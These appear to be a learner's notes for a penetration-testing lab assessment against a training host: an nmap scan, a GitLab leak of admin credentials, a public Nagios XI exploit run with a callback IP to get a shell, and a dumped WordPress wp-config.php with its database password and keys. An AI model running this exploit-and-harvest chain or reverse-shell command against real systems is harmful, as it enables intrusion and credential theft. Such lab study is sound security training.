Assessment 2

nmap 10.129.235.11
Starting Nmap 7.93 ( https://nmap.org ) at 2025-09-13 11:36 EDT
Nmap scan report for gitlab.inlanefreight.local (10.129.235.11)
Host is up (0.097s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
389/tcp  open  ldap
443/tcp  open  https
8180/tcp open  unknown

80 / 443 have an inlanefreight website

8180 - gitlab instance

• created a user
• searching for projects, we find monitoring.inalenfreight.local
• in the project, we see a commit with admin creds to the monitoring website
• adding to /etc/hosts
• logging in with the admin creds
• using version - 5.7.5
• trying - https://www.exploit-db.com/exploits/49422
• python3 nagiosxi-5.7.x.py https://monitoring.inlanefreight.local nagiosadmin P@ssw0rd 10.10.14.6 8884

we get shell as www-data

• the folder where we spawn has a <hash>_flag.txt

More enum:

• user nagios has a cookie.txt - didnt seem important
• /var/www has a few websites
  • app.ilf.local - nothing
  • mrtg - nothing
  • html - seems like our 80/443 website
  • blog.ilf.local - wordpress website
• added blog.ilf.local to /etc/hosts

• reading through /wp-config.php

  / ** MySQL settings - You can get this info from your web host ** //                                        
  /** The name of the database for WordPress */                                           
  define( 'DB_NAME', 'wordpress' );   
  
  /** MySQL database username */                                                         
  define( 'DB_USER', 'wordpressadm' );                                                    
  /** MySQL database password */                                                          
  define( 'DB_PASSWORD', 'HTB_@cademy_WP!' );   
  
  /** MySQL hostname */                                                                 
  define( 'DB_HOST', 'localhost' );                                                       
  /** Database charset to use in creating database tables. */                             
  define( 'DB_CHARSET', 'utf8' );                                                         
  /** The database collate type. Don't change this if in doubt. */                        
  define( 'DB_COLLATE', '' );                                                             
  /**#@+                                                                                                                                                                                                             
   * Authentication unique keys and salts.                                                            
   * Change these to different unique phrases! You can generate these using                                                                                                                                          
   * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
   *
   * You can change these at any point in time to invalidate all existing cookies.
   * This will force all users to have to log in again.
   *
   * @since 2.6.0
   */
  define('AUTH_KEY',         'p0YGoceyDDV+%w)uy&;4{Hc@}Ge^++ydjC^w~Sdc<wofL$~QxQ7?OreLT9G~I}Z:');
  define('SECURE_AUTH_KEY',  'y&C}JsD%*5Qih^__dWL(WLqZ9q>tzU;(px>KL[X4sn<(.b~tFru:(gWNbSE/jd5y');
  define('LOGGED_IN_KEY',    '^&g5_3p`Ct 65J1(B}JeI.r[N}g;i!e)OA/^!Z:3FMku)4~-}xSY)~yZ9t|AL8g|');
  define('NONCE_KEY',        'F{ Qq(&r|B,+>OG-HzTcwKp-2_/L*zaW(S2z0[Q%4NXX^{$gxI+FJ()}[+8{+C7)');
  define('AUTH_SALT',        '{42dgC+13-(v_$fd7+nKm>~A(&%6.~TIPux*pj#TE|(]0ooSf9TjHX:`.ijv1,NK');
  define('SECURE_AUTH_SALT', '}>z`-z4!,2.?G&f!eW5gd)^hVoYlh+}!>1cu!PSO3[E-{m/|yC$JgX*x?3g hB1]');
  define('LOGGED_IN_SALT',   '^an]TQGa?9-m}=hLlzsolA]ZGSx]aFLV,;Wn3D?JGrUa7nT24x{07k4Q.%&89]Jk');
  define('NONCE_SALT',       '[Zn2UfL-*qVR,cms9V^x2.3`U3gQK].jX@MADSt|{^[t N4 ?9]J*XB;h-}9,=9>');
  /**#@-*/